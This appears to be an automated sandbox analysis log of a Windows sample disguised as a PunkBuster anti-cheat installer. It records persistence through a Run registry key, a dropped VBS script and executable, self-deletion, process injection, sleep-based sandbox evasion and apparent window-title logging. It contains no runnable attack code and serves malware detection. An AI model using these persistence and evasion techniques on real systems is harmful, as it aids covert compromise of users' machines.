              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: The version of PnkBstrA installed on your system is outdated. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exeString found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service. Please make your selection and then click "Next" to continue.
              Source: 4wECQoBvYC.exeString found in binary or memory: Install/Re-Install PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-Install/Remove PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue.
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-Install PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: Are you sure you want to un-install the PunkBuster Service?
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: You must specify install or un-install when using the no-display command-line switch.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: You must specify install or un-install when using the no-prompts command-line switch.
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-installing
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: Could not read PnkBstrB port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: Could not read PnkBstrA port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: The version of PnkBstrA installed on your system is outdated. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exeString found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service. Please make your selection and then click "Next" to continue.
              Source: 4wECQoBvYC.exeString found in binary or memory: Install/Re-Install PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-Install/Remove PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: Could not read PnkBstrB port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: Could not read PnkBstrA port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: The version of PnkBstrA installed on your system is outdated. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exeString found in binary or memory: Stopping PnkBstrKCould not query the PnkBstrK driverPnkBstrKChecking PnkBstrK driver statusReceiving version from PnkBstrBSending version packet to PnkBstrB **ERROR: Could not read PnkBstrB port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.Getting port for PnkBstrBCHANGED (%ld)
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: Could not read PnkBstrA port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.PortGetting port for PnkBstrANOT RUNNING
              Source: 4wECQoBvYC.exeString found in binary or memory: PnkBstrB file not found **ERROR: The version of PnkBstrA installed on your system is outdated. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.OUTDATED (%ld)
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: You must specify install or un-install when using the no-display command-line switch.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: You must specify install or un-install when using the no-prompts command-line switch.
              Source: 4wECQoBvYC.exeString found in binary or memory: **ERROR: You must specify install or un-install when using the no-display command-line switch. **ERROR: You must specify install or un-install when using the no-prompts command-line switch.q2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6)your program
              Source: 4wECQoBvYC.exeString found in binary or memory: Are you sure you want to un-install the PunkBuster Service?
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-Install PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: @PunkBuster Service Setup v%d.%d %s - Step 1 of 2PunkBuster Service Setup v%d.%d %s- Step 1 of 3Are you sure you want to un-install the PunkBuster Service?Un-Install PunkBuster ServiceP Q
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-installing
              Source: 4wECQoBvYC.exeString found in binary or memory: @PunkBuster Service Setup v%d.%d %s - Step 3 of 3 - %sPunkBuster Service Setup v%d.%d %s - Step 2 of 2 - %sUn-installingInstalling`!Q
              Source: 4wECQoBvYC.exeString found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service.
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-Install/Remove PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: Install/Re-Install PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: &Test ServicesUn-Install/Remove PunkBuster ServiceInstall/Re-Install PunkBuster ServicePunkBuster Service SetupFinished! NOTE: A reboot may be necessary to completely remove the service files.Installation Finished.
              Source: 4wECQoBvYC.exeString found in binary or memory: <!--StartFrag
              Source: 4wECQoBvYC.exeString found in binary or memory: <!--StartFragment -->
              Source: 4wECQoBvYC.exeString found in binary or memory: hAFailed to put data on the clipboardFailed to set clipboard data.<!--EndFragEndFragment<!--StartFragStartFragmentEndHTML%08u<html>StartHTML<!--EndFragment-->
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeFile read: C:\Users\user\Desktop\4wECQoBvYC.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs"
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: k7rn7l32.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: ntd3ll.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 4wECQoBvYC.exeStatic file information: File size 4087808 > 1048576
              Source: 4wECQoBvYC.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1a4000
              Source: 4wECQoBvYC.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x117000
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DBCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_000DBCE3
              Source: 4wECQoBvYC.exeStatic PE information: real checksum: 0x2f3a40 should be: 0x3e8ca0
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_0048D070 push ecx; mov dword ptr [esp], 00000000h0_2_0048D086
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BC0F4 push eax; ret 0_2_004BC112
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BD303 push ecx; ret 0_2_004BD313
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BC670 push eax; ret 0_2_004BC684
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BC670 push eax; ret 0_2_004BC6AC
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_0048CFD0 push ecx; mov dword ptr [esp], 00000000h0_2_0048CFE6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_001167E0 push eax; ret 2_2_001167FE
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011B9DD push esi; ret 2_2_0011B9E6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011CCDC push esp; retf 0011h2_2_0011CCDD
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011CD3C pushad ; retf 2_2_0011CD3D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011CD28 push eax; retf 2_2_0011CD39
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011CD60 pushad ; retf 2_2_0011CD3D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_00115EAF push ecx; ret 2_2_00115EC2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F3FF6 push ecx; ret 2_2_000F4009
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0048D070 push ecx; mov dword ptr [esp], 00000000h2_2_0048D086
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BC0F4 push eax; ret 2_2_004BC112
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BD303 push ecx; ret 2_2_004BD313
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BC670 push eax; ret 2_2_004BC684
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BC670 push eax; ret 2_2_004BC6AC
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0046AEA0 pushfd ; iretd 2_2_0046AEB6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0048CFD0 push ecx; mov dword ptr [esp], 00000000h2_2_0048CFE6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0046AFF0 pushfd ; iretd 2_2_0046B085
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0046AFF0 pushfd ; iretd 2_2_0046B0D3
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0046AF80 pushfd ; iretd 2_2_0046B085

              Persistence and Installation Behavior

              barindex
              Drops PE files to the document folder of the user
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeFile created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C6128 ShellExecuteW,URLDownloadToFileW,2_2_000C6128
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeFile created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D9BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_000D9BC4
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVansJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVansJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Deletes itself after installation
              Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\4wecqobvyc.exeJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DBCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_000DBCE3
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Delayed program exit found
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000CE54F Sleep,ExitProcess,2_2_000CE54F
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_000D98C2
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeWindow / User API: threadDelayed 2613Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeWindow / User API: threadDelayed 6867Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeWindow / User API: foregroundWindowGot 1749Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeDropped PE file which has not been started: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeAPI coverage: 0.4 %
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 528Thread sleep count: 232 > 30Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 528Thread sleep time: -116000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948Thread sleep count: 2613 > 30Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948Thread sleep time: -7839000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948Thread sleep count: 6867 > 30Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948Thread sleep time: -20601000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000CB335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_000CB335
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DB42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,2_2_000DB42F
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000CB53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_000CB53A
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0010D5E9 FindFirstFileExA,2_2_0010D5E9
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C89A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,2_2_000C89A9
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C7A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,2_2_000C7A8C
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C6AC2 FindFirstFileW,FindNextFileW,2_2_000C6AC2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D8C69 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_000D8C69
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C8DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,2_2_000C8DA7
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C6F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_000C6F06
              Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001B3A000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000003.2200600896.0000000001B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[O
              Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001B3A000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000003.2200600896.0000000001B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeAPI call chain: ExitProcess graph end nodegraph_2-59743
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000FA65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000FA65D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DBCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_000DBCE3
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_00102554 mov eax, dword ptr fs:[00000030h]2_2_00102554
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0010E92E GetProcessHeap,2_2_0010E92E
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F4168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000F4168
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000FA65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000FA65D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F3B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000F3B44
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F3CD7 SetUnhandledExceptionFilter,2_2_000F3CD7

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeMemory written: C:\Users\user\Desktop\4wECQoBvYC.exe base: C0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe2_2_000D0F36
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D8754 mouse_event,2_2_000D8754
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_0040906B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040906B
              Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, registros.dat.2.drBinary or memory string: [2024/12/09 16:42:26 Program Manager]
              Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerD
              Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagersInfos
              Source: registros.dat.2.drBinary or memory string: [2024/12/09 16:42:19 Program Manager]
              Source: registros.dat.2.drBinary or memory string: [2024/12/09 16:42:08 Program Manager]
              Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerz
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F3E0A cpuid 2_2_000F3E0A
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: GetLocaleInfoA,2_2_000CE679
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: GetLocaleInfoW,2_2_001110BA
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: EnumSystemLocalesW,2_2_001070AE
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_001111E3
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: GetLocaleInfoW,2_2_001112EA
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_001113B7
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: GetLocaleInfoW,2_2_00107597
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00110A7F
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: EnumSystemLocalesW,2_2_00110CF7
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: EnumSystemLocalesW,2_2_00110D42
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: EnumSystemLocalesW,2_2_00110DDD
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00110E6A
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BE9CD GetSystemTimeAsFileTime,__aulldiv,0_2_004BE9CD
